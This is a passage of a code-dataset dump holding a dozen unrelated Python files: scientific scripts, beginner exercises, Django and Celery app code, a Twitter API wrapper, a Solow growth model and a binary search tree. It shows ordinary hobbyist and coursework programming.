selIntensityDeque.append(IntensityDeque[i])\n selIntensityDeque = filterLocalMaxmum(IntensityDeque,selIntensityDeque)\n relativeHeightDeque = getRelativeHeight(IntensityDeque, selIntensityDeque)\n\n finalTThetaDeque = deque()\n finalIntensityDeque = deque()\n finalRelativeHeight = deque()\n cond = True\n while cond:\n for h in relativeHeightDeque:\n if h > initialHeight:\n finalRelativeHeight.append(h)\n finalIntensityDeque.append(selIntensityDeque[relativeHeightDeque.index(h)])\n if len(finalIntensityDeque) > peaksNum:\n initialHeight += 1\n finalIntensityDeque = deque()\n finalRelativeHeight = deque()\n else:\n cond = False\n for intensity in finalIntensityDeque:\n finalTThetaDeque.append(TThetaDeque[IntensityDeque.index(intensity)])\n # 对所有TTheta保留3位小数\n # finalTThetaDeque = [round(TTheta, 3) for TTheta in finalTThetaDeque]\n # 对所有TTheta保留2位小数\n # finalTThetaDeque = [round(TTheta, 2) for TTheta in finalTThetaDeque]\n # 对所有TTheta保留1位小数\n finalTThetaDeque = [round(TTheta, 1) for TTheta in finalTThetaDeque]\n # 对所有TTheta保留0位小数\n # finalTThetaDeque = [round(TTheta) for TTheta in finalTThetaDeque]\n peakDict = {'TTheta':finalTThetaDeque, 'Intensity':finalIntensityDeque, 'RelativeHeight':finalRelativeHeight}\n return peakDict\n# -----------------------------Test-----------------------------------------\n# a = findPeaks(1, 4, startIndex = 1100, endIndex = 1705, initialHeight = 50, peaksNum = 12)\n# for index in range(len(a['TTheta'])):\n# print('TTheta',a['TTheta'][index])\n# print('Intensity', a['Intensity'][index])\n# print('RelativeHeight', a['RelativeHeight'][index])\n# print('-----------------')","sub_path":"python_src/findPeaksV2.py","file_name":"findPeaksV2.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"306889624","text":"# 使う時はterminalから\"pytest file名\"とする\nimport os\nimport pytest\n\nimport lesson_unittest\n\nclass TestCal(object):\n\n @classmethod\n def setup_class(cls):\n cls.cal = lesson_unittest.Cal()\n cls.test_file_name = 'test.txt'\n\n def test_add_num_and_double(self, csv_file):\n print(csv_file)\n assert self.cal.add_num_and_double(1, 1) == 4\n\n def test_save(self, tmpdir):\n self.cal.save(tmpdir, self.test_file_name)\n test_file_path = os.path.join(tmpdir, self.test_file_name)\n assert os.path.exists(test_file_path) is True","sub_path":"section14/lesson_pytest_fixture2.py","file_name":"lesson_pytest_fixture2.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"506637795","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\n\nimport json\n\nfrom .models import Schema\n\n# Create your views here.\ndef recluit(request):\n if request.method == 'POST':\n experience_about = request.POST.get('desc')\n experience_type = request.POST.get('about')\n recluit_motive = request.POST.get('motive')\n recluit_name = request.POST.get('name')\n recluit_email = request.POST.get('mail')\n recluit_phone = request.POST.get('phone')\n\n response_data = {}\n\n schema = Schema(experience_type=experience_type,experience_about=experience_about,recluit_motive=recluit_motive,recluit_name=recluit_name,recluit_email=recluit_email,recluit_phone=recluit_phone)\n schema.save()\n \n return redirect('/landing/gracias')\n else:\n return HttpResponse(\n json.dumps({\"nothing to see\": \"this isn't happening\"}),\n content_type=\"application/json\"\n )","sub_path":"recluit/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"322928636","text":"from django.db import models\n\n# spelling corrections from CSV and abugames\nCHANGE_ANGELS_TO_ANGLES = True\nCORRECT_VENGENANCE_VENGEANCE = True\n\nfrom django.db import models\n\n\nclass CardSet(models.Model):\n full_name = models.CharField(max_length=200, null=True)\n set_name = models.CharField(max_length=200, null=True)\n search_name = models.CharField(db_index=True, max_length=200)\n abu_name = models.CharField(max_length=200, null=True)\n abu_price = models.FloatField(null=True)\n abu_quantity = models.IntegerField(null=True)\n abu_store_id = models.CharField(max_length=200, null=True)\n last_updated = models.DateTimeField('date published', null=True)\n\n def __str__(self):\n return self.full_name\n\n def name_check(self, abu_name):\n if self.search_name in abu_name:\n return True\n cleaned_name = str(self.search_name).lower().replace(' ', '').replace(\":\", \"\").replace(\"&\", \"and\").replace(\n 'dueldecks', '').replace('globalseries', '')\n abu_name = str(abu_name).lower().replace(' ', '')\n if CHANGE_ANGELS_TO_ANGLES and 'angels' in cleaned_name:\n cleaned_name = cleaned_name.replace('angels', 'angles')\n if CORRECT_VENGENANCE_VENGEANCE and 'vengenance' in cleaned_name:\n cleaned_name = cleaned_name.replace('vengenance', 'vengeance')\n if cleaned_name in abu_name:\n return True\n return False\n\n\nclass CardSetCardMap(models.Model):\n set = models.ForeignKey('CardSet', on_delete=models.CASCADE)\n card = models.ForeignKey('Card', on_delete=models.CASCADE)\n quantity_in_set = models.IntegerField()\n\n\nclass Card(models.Model):\n abu_name = models.CharField(db_index=True, max_length=200, null=True)\n abu_edition = models.CharField(db_index=True, max_length=200, null=True)\n abu_latest_price_trade = models.FloatField(null=True)\n abu_latest_price_buy = models.FloatField(null=True)\n abu_card_number = models.CharField(db_index=True, max_length=20, null=True)\n last_updated = models.DateTimeField('date published', null=True)\n abu_buy_list_quantity = models.IntegerField(null=True)\n abu_multiverse_id = models.CharField(max_length=200, null=True)\n abu_title = models.CharField(db_index=True, max_length=200, null=True)\n\n def __str__(self):\n return self.abu_name\n","sub_path":"web_app/magic_model/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"337381874","text":"\"\"\"\nWrite a program to print the sum of all the digits of a given number.\nExample:\nI/P:1234\nO/P:10\n\"\"\"\n\n\nnum=int(input('enter the number - '))\nsum=0;\n\nwhile(num>0):\n r=num%10\n sum=sum+r\n num=num//10\n\nprint(sum)\n","sub_path":"python/python fundamentals/python fundamentals/prog_8_sum_of_digits.py","file_name":"prog_8_sum_of_digits.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"49136139","text":"from __future__ import print_function\nimport numpy as np\n\n# Run QP tests from different examples\nfrom qp_examples.basis_pursuit import basis_pursuit\nfrom qp_examples.huber_fit import huber_fit\nfrom qp_examples.lasso import lasso\nfrom qp_examples.lp import lp\nfrom qp_examples.nonneg_l2 import nonneg_l2\nfrom qp_examples.portfolio import portfolio\nfrom qp_examples.svm import svm\n\n# from multiprocessing import Process, Queue\nfrom multiprocessing import Pool, cpu_count\nfrom functools import partial\n\n\nimport pandas as pd\n# pd.set_option('display.width', 1000) # See all the columns\n# import matplotlib.pyplot as plt\n# import seaborn as sns\n# ipdb.set_trace()\n\nfrom time import time\n# import ipdb\n\n# Define tests ranges\nrho_vec_len = 30 # Define rho vector\nrho_vec = np.logspace(-6., 6., rho_vec_len)\n# rho_vec = np.array([1000])\n\n\n# sigma_vec_len = 10 # Define sigma vector\n# sigma_vec = np.logspace(-4., 3., sigma_vec_len)\nsigma_vec = np.array([1e-06])\n\n\n# alpha_vec_len = 10 # Define alpha vector\n# alpha_vec = np.linspace(0.1, 1.9, alpha_vec_len)\nalpha_vec = np.array([1.6])\n# alpha_vec = np.array([1.6])\n\n\n\ndim_vecs_len = 30\n# n_vec = np.array([20])\n# m_vec = np.array([30])\nn_max = 500\nm_max = 1000\nn_vec = np.arange(10, n_max, int(n_max/dim_vecs_len))\nm_vec = np.arange(10, m_max, int(m_max/dim_vecs_len))\n\n\n# Number of problems with the same dimensions\nnm_num_prob = 25\n\n# Test options\noptions = {'verbose': False,\n 'polish': False,\n 'early_terminate_interval': 1,\n 'max_iter': 2500}\n\n# Test types\ntest_types = ['basis_pursuit', 'huber_fit', 'lasso',\n 'nonneg_l2', 'lp', 'portfolio', 'svm']\n\n# test_types = ['lasso', 'svm']\n\n\ndef run_examples(test_type, n_vec, m_vec, rho_vec, sigma_vec,\n alpha_vec, nm_num_prob, **kwargs):\n if test_type == 'basis_pursuit':\n return basis_pursuit.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n alpha_vec, nm_num_prob, **kwargs)\n elif test_type == 'huber_fit':\n return huber_fit.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n alpha_vec, nm_num_prob, **kwargs)\n elif test_type == 'lasso':\n return lasso.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n alpha_vec, nm_num_prob, **kwargs)\n elif test_type == 'nonneg_l2':\n return nonneg_l2.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n alpha_vec, nm_num_prob, **kwargs)\n elif test_type == 'lp':\n return lp.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n alpha_vec, nm_num_prob, **kwargs)\n elif test_type == 'portfolio':\n return portfolio.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n alpha_vec, nm_num_prob, **kwargs)\n elif test_type == 'svm':\n return svm.run_tests(n_vec, m_vec, rho_vec, sigma_vec,\n alpha_vec, nm_num_prob, **kwargs)\n\n\n# PARALLEL IMPLEMENTATION\n# ------------------------------------------------------------------------------\n\npartial_tests = partial(run_examples, n_vec=n_vec,\n m_vec=m_vec, rho_vec=rho_vec, sigma_vec=sigma_vec,\n alpha_vec=alpha_vec, nm_num_prob=nm_num_prob, **options)\n\n\nt = time()\n\n# Execute problems in parallel\np = Pool(cpu_count())\nresults = p.map(partial_tests, test_types)\n\n\n# Execute problems in series\n# results = []\n# for i in range(len(test_types)):\n # res = partial_tests(test_types[i])\n # results.append(res)\n\ncputime = time() - t\nprint(\"total cputime = %.4f sec\" % cputime)\n\n# Concatenate dataframes\nresults = pd.concat(results)\n\n\n# Export results\nresults.to_csv('results/results.csv', index=False)\n","sub_path":"interfaces/python/tests/qp_problems/run_qpexamples.py","file_name":"run_qpexamples.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"206013284","text":"# _*_ coding: utf-8 _*_\n'my first Learning Machine'\n_author_ = 'Beans Lee'\n\nimport knn\nimport operator\nfrom numpy import tile\n\ngroup, labels = knn.creatDataSet()\nprint('group = ', group)\nprint('labels = ', labels)\n\ndef classify0(inX, dataSet, labels, k):\n dataSetSize = dataSet.shape[0]\n diffMat = tile(inX, (dataSetSize, 1)) - dataSet\n sqDiffMat = diffMat**2\n sqDistances = sqDiffMat.sum(axis=1)\n distances = sqDistances**0.5\n sortedDistIndicies = distances.argsort()\n classCount = {}\n for i in range(k):\n voteIlabel = labels[sortedDistIndicies[i]]\n classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)\n return sortedClassCount[0][0]\n\nprint('分类器的测试结果:')\nprint('[0,0]: ' + classify0([0, 0], group, labels, 3))\n\n","sub_path":"kNN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"334406633","text":"\nfrom requests_oauthlib import OAuth1\nfrom PIL import Image\nimport urllib\nimport io\nimport requests\nimport json\nimport re\nimport os\n\ntry:\n # python 3\n from urllib.parse import urlparse, urlunparse, urlencode\n from urllib.request import urlopen\n from urllib.request import __version__ as urllib_version\nexcept ImportError:\n from urlparse import urlparse, urlunparse\n from urllib2 import urlopen\n from urllib import urlencode\n from urllib import __version__ as urllib_version\n\n\nfrom .models import *\n\nclass Api:\n '''\n Consumer and consumer sercet keys must be required in order for the authentication.\n '''\n def __init__(self,\n consumer_key = None,\n consumer_secret = None,\n access_token = None,\n access_token_secret = None,\n ):\n\n self.base_url = 'https://api.twitter.com/1.1'\n self.stream_url = 'https://stream.twitter.com/1.1'\n self.firehose = 'https://stream.twitter.com/1.1/statuses/firehose.json'\n self.auth = None\n self.auth_list = None\n self.SetCredential(consumer_key,\n consumer_secret,\n access_token,\n access_token_secret)\n\n def SetCredential(self,\n consumer_key,\n consumer_secret,\n access_token,\n access_token_secret):\n \n\n self.auth_list = [consumer_key,consumer_secret,access_token,access_token_secret]\n if all(self.auth_list):\n self._auth = OAuth1(consumer_key,\n consumer_secret,\n access_token,\n access_token_secret)\n\n def StatusUpdate(self,status):\n param = {'status':status}\n url = '%s/statuses/update.json' % self.base_url\n res = self.GetPost(url=url,data=param)\n return res\n\n\n def GetTrends(self,\n id,\n exclude=None):\n '''\n id: The Yahoo!where on Earth id of the location to return trending \n information for. Global information is available by using 1 as the\n woeid.\n exclud: settings this equal to hashtags will remove all hashtags \n from the trends list.\n '''\n param = {}\n url = '%s/trends/place.json' % self.base_url\n if id:\n param['id']=id\n if exclude:\n param['exclude']=exclude\n res = self.GetRes(url,param)\n data = self.Parse(res.content.decode('utf-8'))\n list = []\n for x in data:\n list.append(x['trends'])\n l = [Trends().AsDict(x) for x in list[0]]\n return l\n\n def GetTrendsTweets(self):\n parse_stuff = [urlparse(x.url) for x in self.GetTrends(id=1)]\n #obj = [self.GetTweets(x.query[2:]) for x in parse_stuff]\n return parse_stuff\n\n def TrendsAvailable(self):\n url = '%s/trends/available.json' % self.base_url\n res = self.GetRes(url)\n data = self.Parse(res.content.decode('utf-8'))\n return [Trends().AsDict(x) for x in data]\n \n \n def GetStatusStreamy(self,\n follow=None,\n delimited=None,\n stall_warnings=None,\n track=None,\n _with=None,\n language=None,\n location=None):\n '''\n delimeited; specify the length if you wish to use.\n stall_warngins; This parameter may be used on all streaming endpoints, unless explicitly noted.\n follow; A comma-separated list of user IDs\n for more details, visit: https://dev.twitter.com/streaming/overview/request-parameters \n '''\n url = '%s/statuses/filter.json' % self.stream_url\n\n param = {}\n if _with:\n param['with']=_with\n if delimited:\n param['delimited']=delimited\n if stall_warnings:\n param['stall_warnings']=stall_warnings\n if follow:\n param['follow']=follow\n if track:\n param['track']=track\n if location:\n param['location']=location\n if language:\n param['language']=language\n\n while True:\n res = self.GetStreamRes(url,data=param)\n resp = res.decode('utf-8')\n return resp\n\n def GetStreamHashtagsFind(self,track):\n stream = self.GetStatusStreamy(track=track)\n return Parse_tweet(stream).GetHashTag()\n\n def GetMedia(self,screen_name,count=None):\n \"\"\"\n default count is set to 20. \n \"\"\"\n if count:\n timeline=self.GetUserTimeLine(screen_name=screen_name,count=count)\n else:\n timeline=self.GetUserTimeLine(screen_name=screen_name,count=20)\n timel=([x.entities for x in timeline])\n media=re.findall(r'http://pbs.twimg.com/media/[a-zA-Z0-9]+',str(timel))\n list = []\n image_list= []\n for x in set(media):\n url = x + \".jpg\"\n list.append(url)\n for image in list:\n try:\n x = urlopen(image)\n y = io.BytesIO(x.read())\n image_list.append(Image.open(y))\n except:\n pass\n return image_list\n\n def SaveImg(self,path=None,screen_name=None):\n if path==None:\n path='Desktop'\n p=os.path.expanduser('~/%s'%path+'/'+os.urandom(10).hex()+'.png')\n return [x.save(p,format='PNG') for x in self.GetMedia(screen_name,count=None)]\n\n def GetUserTimeLine(self,user_id=None,\n screen_name=None,\n since_id=None,\n count=None,\n max_id=None,\n trim_user=None,\n exclude_replies=None,\n contribute_details=None,\n include_rts=None,\n ):\n param = {}\n url = \"%s/statuses/user_timeline.json\" % self.base_url\n if user_id:\n param['user_id']=user_id\n if screen_name:\n param['screen_name']=screen_name\n if count:\n param['count']=count\n if max_id:\n param['max_id']=max_id\n if trim_user:\n param['trim_user']=trim_user\n if exclude_replies:\n param['exclude_replies']=exclude_replies\n if contribute_details:\n param['contribute_replies']=contribute_replies\n if include_rts:\n param['include_rts']=incldue_rts\n\n res = self.GetRes(url,param)\n data = self.Parse(res.content.decode('utf-8'))\n return [Timeline().AsDict(x) for x in data]\n\n def GetUser(self,screen_name=None,\n user_id=None,\n include_entities=None):\n \"\"\"\n Either screen_name or user_id must be required, and otherwise you won't get a user.\n \"\"\"\n param = {}\n url = \"%s/users/show.json\" % self.base_url\n \n if screen_name:\n param['screen_name']=screen_name\n if user_id:\n param['user_id']=user_id\n if include_entities:\n param['incldue_entities']=incldue_entities\n res = self.GetRes(url,param)\n data = self.Parse(res.content.decode('utf-8'))\n return User.AsDict(data)\n \n \n def GetUsersSearch(self,screen_name=None,\n id=None,\n page=1,\n count=20):\n '''\n Only the first 1,000 matching results are available.\n default page is set to 1.\n default count is set to 20.\n go to reference: https://dev.twitter.com/rest/reference/get/users/search\n '''\n \n param = {}\n if screen_name:\n param['q'] = screen_name\n if id:\n param['q'] = id\n if page is not None:\n param['page'] = page\n if count is not None:\n param['count'] = count\n url = '%s/users/search.json' % self.base_url\n res = self.GetRes(url,param)\n data = self.Parse(res.content.decode('utf-8'))\n return [User.AsDict(x) for x in data]\n\n \n def GetTweets(self,\n q,\n geocode=None,\n lang=None,\n locale=None, \n result_type=None,\n count=None,\n until=None,\n since_id=None,\n max_id=None,\n include_entities=None,\n ):\n '''\n query reference: https://dev.twitter.com/rest/reference/get/search/tweets\n \n # \"q\" is must be required and otherwise, you get nothing.\n # \"locale\" is only avaliable at Japanese. I am proude of being Japanese.\n # \"result_types\" enables you to specify what type of search results you look for.\n mixed, for instance is including both poplular and real time results in the response.\n example values: mixed, recent,popular.\n # \"count\" is that you can specify the number of tweets. Up to maximum of 100<3 \n # \"unti\" you will get tweets created before the given data.\n '''\n url = '%s/search/tweets.json' % self.base_url\n\n param = {}\n param['q']=q\n if geocode:\n param['geocode']=geocode\n if lang:\n param['lang']=lang\n if locale:\n param['locale']=locale\n if result_type:\n param['result_type']=result_type\n if count:\n param['count']=count\n if until:\n param['until']=until\n if since_id:\n param['since_id']=since_id\n if max_id:\n param['max_id']=max_id\n if include_entities:\n param['include_entitis']=incldue_entities\n \n res = self.GetRes(url,param)\n data = self.Parse(res.content.decode('utf-8'))\n try:\n status = data['statuses']\n except:\n pass\n meta = data['search_metadata']\n return [Tweets().AsDict(x) for x in status]\n \n \n def GetStreamRes(self,url,data=None):\n if data:\n url = self.UrlBuilder(url,parameters=data)\n res = requests.get(url,auth=self._auth,stream=True)\n res = requests.get(url,auth=self._auth,stream=True)\n for line in res.iter_lines(): #When stream=True is set on the request, this avoids reading the content at once into memory for large responses.\n res = line \n return res\n\n def GetPost(self,url=None,data=None):\n auth = OAuth1(','.join(self.auth_list))\n url = self.UrlBuilder(url,parameters=data)\n res = requests.post(url,data=data,auth=self._auth,timeout=10)\n return res\n\n \n def GetRes(self,url,data=None):\n if data:\n url = self.UrlBuilder(url,parameters=data)\n res = requests.get(url,auth=self._auth)\n\n res = requests.get(url,auth=self._auth)\n return res\n \n\n\n def UrlBuilder(self,url=None,parameters=None):\n '''\n paramters must be hash elements.\n '''\n (scheme,netloc,path,params,query,fragment)= urlparse(url)\n\n if url is None:\n url = self.base_url\n \n if parameters is not None and len(parameters)>0:\n q = urlencode(parameters)\n if query:\n query += '&'+q\n else:\n query = q\n\n return urlunparse((scheme,netloc,path,params,query,fragment))\n\n\n def Parse(self,data):\n '''\n Turn data into json here.\n '''\n try:\n data = json.loads(data)\n\n except Exception as er:\n raise er\n\n return data\n\n\ndef GetHashTag(data):\n r = re.compile(r\"(?P[\\#][\\w+]+)\")\n word = re.compile(r\"?P[\\w+]+\")\n return [re.findAll(x,r) for x in str(data)]\n","sub_path":"twitter/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":12001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"549571511","text":"\r\nfrom celery import shared_task\r\nfrom time import sleep\r\n\r\nfrom django.core.mail import send_mail\r\n\r\nfrom .models import StudentProfile\r\nfrom django.shortcuts import render, redirect,HttpResponse\r\nfrom django.conf import settings\r\nfrom celery.task.schedules import crontab\r\nfrom celery.decorators import periodic_task\r\n\r\n\r\n@shared_task\r\ndef send_mail_task():\r\n print(\"zilani\")\r\n ak = StudentProfile.objects.all()\r\n # print(ak)\r\n mail_list = []\r\n for v in ak:\r\n mail_list.append(v.email)\r\n print(mail_list)\r\n\r\n send_mail(\"celery task check!\",'This proved the Task worked properly','humyaira2019@gmail.com',mail_list)\r\n return None\r\n\r\n\r\n@shared_task\r\ndef single_send_mail_task():\r\n\r\n send_mail(\"celery task check!\",'This proved the Task worked properly','humyaira2019@gmail.com',['sadmanshihab111@gmail.com'])\r\n return None\r\n\r\n\r\n\r\n@periodic_task(\r\n run_every=(crontab(minute='*/25')),\r\n name=\"send_mail\",\r\n ignore_result=True\r\n)\r\n\r\n@shared_task\r\ndef sleepy(duration):\r\n sleep(duration)\r\n return None\r\n","sub_path":"student/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"633887785","text":"'''\nProject Euler: Problem 1: Multiples of 3 and 5\nIf we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.\n\nFind the sum of all the multiples of 3 or 5 below the provided parameter value number.\n'''\n\ndef multiplesOf3and5(number):\n result = 0\n for i in range(number):\n if (i % 3) == 0 or (i % 5) == 0:\n result += i\n return result\n \nprint(multiplesOf3and5(1000)) \n","sub_path":"problem001.py","file_name":"problem001.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42078608","text":"\n# coding: utf-8\n\n# In[18]:\n\n\n##\n## Modelo de Solow\n## Descrição: Implementa um modelo de Solow em python\n## Autor: Guilherme Luft Mendes\n## Data: 09/12/2017\n## Versão: 1.0\n##\n\n\n# In[19]:\n\n\n## Importação de bibliotecas\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# In[79]:\n\n\n# Construção do modelo\nclass Solow():\n '''\n Modelo de Solow\n '''\n \n def __init__(self, tech=1, techGrowth=0, stochasticProcess=None, capital=1, labour=1, labourGrowth=0,\n depreciation=0, savings=0, theta=0):\n '''\n Inicializa o modelo\n '''\n \n # -- Parâmetros --\n self.tech = tech # Tecnologia\n self.techGrowth = techGrowth # Crescimento tecnológico (%)\n self.stochasticProcess = stochasticProcess # Processo estocástico (função lambda)\n self.capital = capital # Estoque total de capital\n self.labour = labour # Estoque total de trabalho\n self.labourGrowth = labourGrowth # Crescimento da força de trabalho (%)\n self.depreciation = depreciation # Depreciação do capital (%)\n self.savings = savings # Taxa de poupança (%)\n self.theta = theta # Renda do capital (Cobb-Douglas)\n \n self.lastStochastic = None\n \n def function(self):\n '''\n Função de produção (Cobb-Douglas)\n '''\n \n return self.capital ** self.theta * self.labour ** (1-self.theta)\n \n def production(self):\n '''\n Produção: tecnologia * função de produção\n '''\n \n return self.tech * self.function()\n \n def productionPW(self):\n '''\n Produção por trabalhador\n '''\n \n return self.production / self.labour\n \n def nextK(self):\n '''\n Estoque total de capital no período t+1\n '''\n \n return (1 - self.depreciation) * self.capital + self.savings * self.production()\n \n def loglin(self):\n '''\n Aproximação log-linear do estoque de capital por trabalhador em t+1\n '''\n \n b = (1 + self.theta * self.labourGrowth - self.depreciation*(1-self.theta)) / (1 + self.labourGrowth)\n c = (self.depreciation + self.labourGrowth) / (1 + self.labourGrowth)\n \n return (b * self.capitalPW() + c * self.lastStochastic)\n \n def nextL(self):\n '''\n Próxima quantidade de trabalhadores\n '''\n \n return self.labour * (1 + self.labourGrowth)\n \n def nextT(self):\n '''\n Próximo nível de tecnologia\n '''\n \n # Se houver processo estocástico, realiza-o\n if self.stochasticProcess != None:\n st = self.stochasticProcess()\n self.lastStochastic = st\n return st\n \n # Senão, aplica taxa de crescimento geométrico\n else:\n return self.tech * (1 + self.techGrowth)\n \n def update(self):\n '''\n Atualiza os níveis de capital, trabalho e tecnologia, passando do período\n t para o período t+1\n '''\n \n self.capital = self.nextK()\n self.labour = self.nextL()\n self.tech = self.nextT()\n \n def capitalPW(self):\n '''\n Capital por trabalhador\n '''\n \n return self.capital / self.labour\n \n def stationary(self):\n '''\n Retorna o capital por trabalhador no estado estacionário\n '''\n \n return ((self.savings * self.tech) / (self.depreciation + self.labourGrowth)) ** (1 / (1 - self.theta))\n \n def KGR(self):\n '''\n Retorna a taxa de crescimento do capital por trabalhador (capital growth)\n '''\n \n return self.nextK() / self.capital\n \n def stationaryKGR(self):\n '''\n Retorna a taxa de crescimento do capital por trabalhador, no estado estacionário\n '''\n \n return ((1 + self.techGrowth) ** (1 / (1 - self.theta)))\n \n def goldenSavings(self):\n '''\n Retorna a regra de ouro da poupança, ou o nível de poupança que maximiza\n o bem estar no estado estacionário\n '''\n \n return ((self.depreciation + self.labourGrowth) / (self.theta * self.tech)) ** (1 / (1 - self.theta))\n \n \n def ts(self, length, log=False):\n '''\n Gera uma série temporal da evolução do capital por trabalhador\n length : tamanho da série\n log : se True, gera também uma série paralela com as aproximações log-lineares\n '''\n \n data = []\n logs = []\n \n for i in range(length+1):\n data.append(self.capitalPW())\n \n if log == True and len(data) > 1:\n logs.append(self.loglin())\n \n self.update()\n \n if log == True:\n return data[:-1], logs\n else:\n return data[:-1]\n \n\n\n# In[80]:\n\n\n# Exemplo 1 - Modelo estocástico\n\nsize = 120\nfig, ax = plt.subplots()\nlines = ['-', '--', '-.']\nmedia = [0] * size\n\nfor i in range(3):\n model = Solow(depreciation=0.1, savings=0.2, theta=0.36, labourGrowth=0.02, capital=2.27,\n stochasticProcess = lambda : math.exp(np.random.normal(0,0.2)))\n \n data = model.ts(size)\n for j in range(size):\n media[j] += data[j] / 3\n \n ax.plot(data, lines[i], alpha=0.9, c='black', lw=0.8)\n\nax.set_xlabel('Tempo')\nax.set_ylabel('Capital por trabalhador')\nax.set_title('Figura 1: Três simulações do modelo de Solow')\nplt.show()\n\n\n# In[90]:\n\n\n# Exemplo 2 - Aproximação log-linear\n\nmodel = Solow(depreciation=0.1, savings=0.2, theta=0.36, labourGrowth=0.02, capital=2.27,\n stochasticProcess = lambda : math.exp(np.random.normal(0,0.2)))\n\nsize = 120\ndata, logs = model.ts(size, log=True)\n\nfig, ax = plt.subplots()\nax.plot(data, '-', c='k', lw=0.8, label='Exato')\nax.plot(logs, '--', c='k', lw=0.8, label='log-linear')\n\nax.legend()\n\nax.set_xlabel('Tempo')\nax.set_ylabel('Capital por trabalhador')\nax.set_title('Figura 2: Simulação do modelo exato e log-linear de Solow')\n\nplt.show()\n\n","sub_path":"Solow.py","file_name":"Solow.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"243070987","text":"#! /usr/bin/python3.6\n#-*- coding:utf-8 -*-\n\nclass TreeNode(object):\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\nclass Utils(object):\n def preorder_traverse(self, root):\n \"\"\"\n :param root:\n :return:\n \"\"\"\n def dfs(r):\n if r:\n dfs(r.left)\n print(r.val, end=' ')\n dfs(r.right)\n dfs(root)\n print()\n\nclass BinarySearchTree(object):\n def __init__(self):\n self.root = None\n\n def insert(self, val):\n if self.root is None:\n self.root = TreeNode(val)\n return\n\n def dfs(root):\n if root.val > val:\n if root.left is None:\n root.left = TreeNode(val)\n return\n dfs(root.left)\n elif root.val < val:\n if root.right is None:\n root.right = TreeNode(val)\n return\n dfs(root.right)\n dfs(self.root)\n\n def get_max_val_node_of_bst(self, root, parent):\n if root:\n if root.right:\n return self.get_max_val_node_of_bst(root.right, root)\n return root, parent\n return None, parent\n\n def get_node_and_its_parent(self, val, root, parent):\n if root:\n if root.val == val:\n return [root, parent]\n if root.val > val:\n return self.get_node_and_its_parent(val, root.left, root)\n return self.get_node_and_its_parent(val, root.right, root)\n return None, None\n\n\n\n def remove(self, val, root):\n if not root:\n return None\n if root.val > val:\n root.left = self.remove(val, root.left)\n elif root.val < val:\n root.right = self.remove(val, root.right)\n else:\n if root.left is None:\n return root.right\n if root.right is None:\n return root.left\n left = root.left\n while left.right:\n left = left.right\n root.val = left\n root.left = self.remove(root.val, root.left)\n return root\n\n\n\n\n\n\ndef main():\n tree = BinarySearchTree()\n for num in [7,4,9,2,6,8,10,1,3,5]:\n tree.insert(num)\n util = Utils()\n util.preorder_traverse(tree.root)\n # tree.remove(4)\n # tree.remove(7)\n # tree.remove(3)\n tree.remove(1, tree.root)\n util.preorder_traverse(tree.root)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"python/trees/binary_search_tree/bst_tree.py","file_name":"bst_tree.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"473118711","text":"import asyncio\nimport inspect\nimport logging\n\n__all__ = [\"read_file_ignore_errors\", \"start_timer\"]\n\nlog = logging.getLogger(\"utils\")\n\ndef read_file_ignore_errors(path):\n try:\n with open(path, \"r\") as f:\n return f.read().strip()\n except:\n return None\n\ndef raise_event(handler, *args):\n try:\n res = handler(*args)\n\n if inspect.isawaitable(res):\n asyncio.ensure_future(res)\n except Exception as e:\n log.error(\"Exception in event handler\", exc_info=e)\n\ndef run_event_loop(debug=False):\n loop = asyncio.get_event_loop()\n\n if debug:\n loop.set_debug(True)\n\n import warnings\n warnings.simplefilter(\"always\", ResourceWarning)\n\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n print(\"\\nTrying to shut down gracefully... (Ctrl-C to force)\")\n\n for task in asyncio.Task.all_tasks():\n task.cancel()\n\n async def _stop():\n loop.stop()\n\n loop.run_until_complete(_stop())\n finally:\n loop.close()\n\ndef start_timer(func, interval):\n async def timer_coro():\n while True:\n try:\n res = func()\n\n if inspect.isawaitable(res):\n await res\n except Exception as e:\n log.error(\"Exception in timer function\", exc_info=e)\n\n await 